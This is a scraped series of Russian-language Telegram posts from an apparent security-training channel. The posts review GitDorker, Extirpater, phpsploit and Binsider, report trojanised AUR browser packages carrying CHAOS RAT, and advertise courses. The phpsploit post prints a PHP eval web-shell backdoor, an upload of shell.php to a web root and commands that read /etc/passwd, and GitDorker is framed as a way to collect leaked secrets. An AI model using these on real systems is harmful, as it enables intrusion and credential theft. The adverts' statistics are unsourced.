Инструмент, написанный на Python, который использует GitHub Search API и обширный список GitHub-дорков, составленных из различных источников, для поиска конфиденциальной информации, хранящейся на GitHub.
Основной целью является предоставление пользователю чистой и адаптированной поверхности атаки для сбора конфиденциальной информации на GitHub. GitDorker можно использовать с дополнительными инструментами, такими как GitRob или Trufflehog, для получения более точных результатов.
Для работы с инструментом также потребуется персональный токен GitHub. Установка осуществляется через следующие команды:
git clone https://github.com/obheda12/GitDorker.git
cd GitDorker
pip3 install -r requirements.txt
Представленный ниже запрос будет искать информацию связанную с "codeby".
python3 GitDorker.py -tf TOKENSFILE -q codeby -d Dorks/DORKFILE -o output.txt
Кроме того можно указать дополнительную информацию с помощью флагов -org, -u и т.д., чтобы сузить диапазон поиска и увеличить количество шансов на успех.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13❤9🔥6
Extirpater
Extirpater - мощный инструмент для полного уничтожения данных на Android-устройстве без возможности восстановления.
💡 Харакетеристики:
В отличие от стандартного удаления, при котором файлы просто удаляются из индекса файловой системы, Extirpater гарантирует, что ваши данные не подлежат возврату. Он заполняет свободное пространство случайными данными, а затем полностью очищает его, делая восстановление невозможным.
📎 Установка:
👩💻 Проект доступен в магазине F-droid:
👩💻 Исходный код:
📌 Использование:
Выбирете
Extirpater - мощный инструмент для полного уничтожения данных на Android-устройстве без возможности восстановления.
В отличие от стандартного удаления, при котором файлы просто удаляются из индекса файловой системы, Extirpater гарантирует, что ваши данные не подлежат возврату. Он заполняет свободное пространство случайными данными, а затем полностью очищает его, делая восстановление невозможным.
https://f-droid.org/packages/us.spotco.extirpater/
https://github.com/divested-mobile/extirpater
Выбирете
Primary
или Secondary Storage
и нажмите кнопку Start
.Please open Telegram to view this post
VIEW IN TELEGRAM
❤11👍9🔥6
phpsploit: Мощный фреймворк для пентеста PHP-приложений
❓ Основные возможности:
➡️ Удалённое выполнение кода (RCE): позволяет загружать и выполнять произвольный PHP-код на целевой системе, поддерживает интерактивную командную строку.
➡️ Стелс-режим: минимизирует следы присутствия в логах и файловой системе, поддерживает шифрование трафика.
➡️ Гибкость и модульность: встроенные модули для сканирования и эксплуатации, возможность написания собственных плагинов на Python.
➡️ Поддержка сессий и многопоточности: сохранение сессий для возобновления работы, параллельное выполнение задач.
➡️ Кросс-платформенность: работает на Linux, Windows и macOS.
⬇️ Установка и использование:
1️⃣ Установка phpsploit:
2️⃣ Настройка подключения:
3️⃣ Основные команды:
4️⃣ Пример эксплуатации:
Применение в безопасности:
- Тестирование на уязвимости RCE в PHP-приложениях
- Пост-эксплуатация после успешного взлома
- Аудит веб-серверов на наличие бекдоров
phpsploit - это продвинутый инструмент с открытым исходным кодом, предназначенный для тестирования безопасности веб-приложений на PHP. Он сочетает в себе функции бекдора, шелл-клиента и фреймворка для эксплуатации уязвимостей.
git clone https://github.com/nil0x42/phpsploit.git
cd phpsploit
pip install -r requirements.txt
./phpsploit
set TARGET http://example.com/vulnerable.php
set BACKDOOR <?php eval($_POST['cmd']); ?>
run exploit
exploit - запуск эксплойта
shell - интерактивная оболочка
scan file - поиск файлов
download - скачивание файлов
sessions - управление сессиями
upload /path/to/shell.php /var/www/html/shell.php
exec "whoami"
exec "cat /etc/passwd"
scan /var/www/html
Применение в безопасности:
- Тестирование на уязвимости RCE в PHP-приложениях
- Пост-эксплуатация после успешного взлома
- Аудит веб-серверов на наличие бекдоров
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12❤7🔥5👎1
Взламываем мифы о безопасности Android
Знаете ли вы:
🟧 85% мобильных приложений содержат критические уязвимости (отчет OWASP 2024)
🟧 Каждое 3-е приложение в Google Play имеет уязвимости, связанные с хранением данных (исследование Positive Technologies).
🟧 Атаки на Android выросли на 50% за последние 2 года — (данные Kaspersky Lab), пора научиться защищаться!
На курсе Анализ защищённости приложений Андроид за 3,5 месяца освоите реальные инструменты защиты:⬇️
✨ Разберете Android-приложения изнутри
✨ Освоите инструменты статического и динамического анализа
✨ Научитесь находить и устранять уязвимости на практике
21 июля старт обучения:
мини-группа до 8 человек + персональный разбор заданий
🟠 Успейте записаться
✨ Курс создан для:
Сотрудников подразделений ИБ для повышения квалификации, новичков в сфере анализа мобильных приложений, реверс-инженеров для повышения квалификации в области мобильных приложений
🚀 По всем вопросам пишите @Codeby_Academy
Знаете ли вы:
На курсе Анализ защищённости приложений Андроид за 3,5 месяца освоите реальные инструменты защиты:
21 июля старт обучения:
мини-группа до 8 человек + персональный разбор заданий
Сотрудников подразделений ИБ для повышения квалификации, новичков в сфере анализа мобильных приложений, реверс-инженеров для повышения квалификации в области мобильных приложений
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13❤7🔥6
🚩 Новые задания на платформе HackerLab!
🌍 Категория Веб — PDF-библиотека
🎢 Категория Разное — Рекурсия
Приятного хакинга!
Приятного хакинга!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍6❤5
Пентестеру важно понимать DNS и его записи, чтобы выявлять инфраструктуру, скрытые сервисы и уязвимости, проверять защиту почты и находить возможности для атак. Это помогает эффективно планировать атаки и искать слабые места в безопасности.
🔥29👍12❤8
Binsider
Binsider — швейцарский нож для реверсёров. Инструмент для анализа бинарных файлов ELF, который предлагает мощные средства статического и динамического анализа.
💡 Харакетеристики:
⏺️ Статический анализ - Позволяет анализировать структуру ELF, включая секции, сегменты, символы и перемещения.
⏺️ Динамический анализ - Возможность выполнения бинарного файла и отслеживания системных вызовов, сигналов и потока выполнения программы.
⏺️ Извлечение строк - Подобно команде strings, Binsider может извлекать строки из бинарного файла для поиска интересных данных, таких как URL, пароли и другая чувствительная информация.
⏺️ Hexdump - Предоставляет структурированный просмотр бинарного содержимого с возможностью анализа в шестнадцатеричном формате.
📎 Установка:
Использование:
Binsider — швейцарский нож для реверсёров. Инструмент для анализа бинарных файлов ELF, который предлагает мощные средства статического и динамического анализа.
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh #Установка Rust
sudo apt install cargo
cargo install binsider
sudo cp /home/kali/.cargo/bin/binsider /bin
Использование:
binsider [PATH_TO_BINFILE]
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13🔥6❤5
Ваши данные уже в сети. Вы уверены, что они в безопасности?
Знаете ли вы, что:
- 92% людей даже не подозревают, какая информация о них есть в открытом доступе
- Ваши старые аккаунты на форумах и в соцсетях до сих пор можно найти
- Фото с геометками из отпуска 5-летней давности могут указать ваш домашний адрес
- Пароли из утечек 2010-х годов до сих пор используют для взлома аккаунтов
Ваши данные уже ищут — научитесь защищаться!
Что даст курс:
- Поиск своих "утекших" данных
- Удаление личной информации из сетей
- Настройки приватности, которые работают
- Методы безопасного серфинга
✅ 92% людей не контролируют свой цифровой след — будьте в меньшинстве!
🔴 Начать обучение запись до 31 июля!
По всем вопросам @Codeby_Academy
Знаете ли вы, что:
- 92% людей даже не подозревают, какая информация о них есть в открытом доступе
- Ваши старые аккаунты на форумах и в соцсетях до сих пор можно найти
- Фото с геометками из отпуска 5-летней давности могут указать ваш домашний адрес
- Пароли из утечек 2010-х годов до сих пор используют для взлома аккаунтов
Ваши данные уже ищут — научитесь защищаться!
Что даст курс:
- Поиск своих "утекших" данных
- Удаление личной информации из сетей
- Настройки приватности, которые работают
- Методы безопасного серфинга
По всем вопросам @Codeby_Academy
Please open Telegram to view this post
VIEW IN TELEGRAM
❤12👍7🔥6
Помните, «Величайший враг спрячется там, где вы будете меньше всего искать», поэтому ищите лучше!
Делитесь своими ответами и размышлениями в комментариях
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤12👍7🔥6
Если хотите разобраться, как данные бегают по сети, какие протоколы могут быть атакованы, и что происходит при обычной загрузке сайта — читайте гайд, где мы проходимся по всем 7 уровням модели OSI с примерами, угрозами и практическими выводами для ИБ.
«Основы сетей для начинающих в ИБ: без модели OSI ты слеп»
Разобрались в теории? Вот с чего стоит начать практику:
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12❤6🔥6
Arch Linux удалил три пакета из AUR, распространявших троян CHAOS
1️⃣ В чём суть?
В популярном репозитории AUR (Arch User Repository), который используется миллионами пользователей Arch Linux и производных дистрибутивов (Manjaro, EndeavourOS и др.), обнаружен вредоносный пакет. Злоумышленники внедрили в него троян CHAOS, способный похищать конфиденциальные данные пользователей.
2️⃣ Как назывались эти пакеты?
librewolf-fix-bin, firefox-patch-bin и zen-browser-patched-bin загружали вредоносный код с GitHub.
3️⃣ Что за троян CHAOS?
CHAOS RAT — это троян удаленного доступа с открытым исходным кодом, разработанный для Windows и Linux. Он может: 1)Загружать и скачивать файлы. 2) Выполнять произвольные команды. 3) Открывать обратную оболочку для удаленного управления.
4️⃣ Чем всё закончилось?
Пакеты были загружены 16 июля пользователем с ником danikpapas и успели повисеть в AUR два дня, после чего Arch Linux оперативно их удалила.
📌 Рекомендации для пользователей!
Если вы устанавливали данные пакеты, срочно исполните следующие инструкции:
1) Проверите систему на наличие подозрительного исполняемого файла systemd-initd, который может находиться в директории /tmp.
2) Убедесь, что система не была скомпрометирована, проверив сетевые подключения и другие признаки вредоносной активности.
В популярном репозитории AUR (Arch User Repository), который используется миллионами пользователей Arch Linux и производных дистрибутивов (Manjaro, EndeavourOS и др.), обнаружен вредоносный пакет. Злоумышленники внедрили в него троян CHAOS, способный похищать конфиденциальные данные пользователей.
librewolf-fix-bin, firefox-patch-bin и zen-browser-patched-bin загружали вредоносный код с GitHub.
CHAOS RAT — это троян удаленного доступа с открытым исходным кодом, разработанный для Windows и Linux. Он может: 1)Загружать и скачивать файлы. 2) Выполнять произвольные команды. 3) Открывать обратную оболочку для удаленного управления.
Пакеты были загружены 16 июля пользователем с ником danikpapas и успели повисеть в AUR два дня, после чего Arch Linux оперативно их удалила.
Если вы устанавливали данные пакеты, срочно исполните следующие инструкции:
1) Проверите систему на наличие подозрительного исполняемого файла systemd-initd, который может находиться в директории /tmp.
2) Убедесь, что система не была скомпрометирована, проверив сетевые подключения и другие признаки вредоносной активности.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17❤6🔥6
Вы можете быть мастером эксплуатации, но если не знаете, где копать — ничего не найдете.
Всё начинается с OSINT: поддомены, утекшие ключи, старые Jenkins, забытые API — всё это может быть входом.
В новой статье рассказываем:
И да, всё на реальных кейсах.
Хотите так же анализировать инфраструктуру цели, находить утечки и строить полноценные OSINT-цепочки?
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13❤6🔥4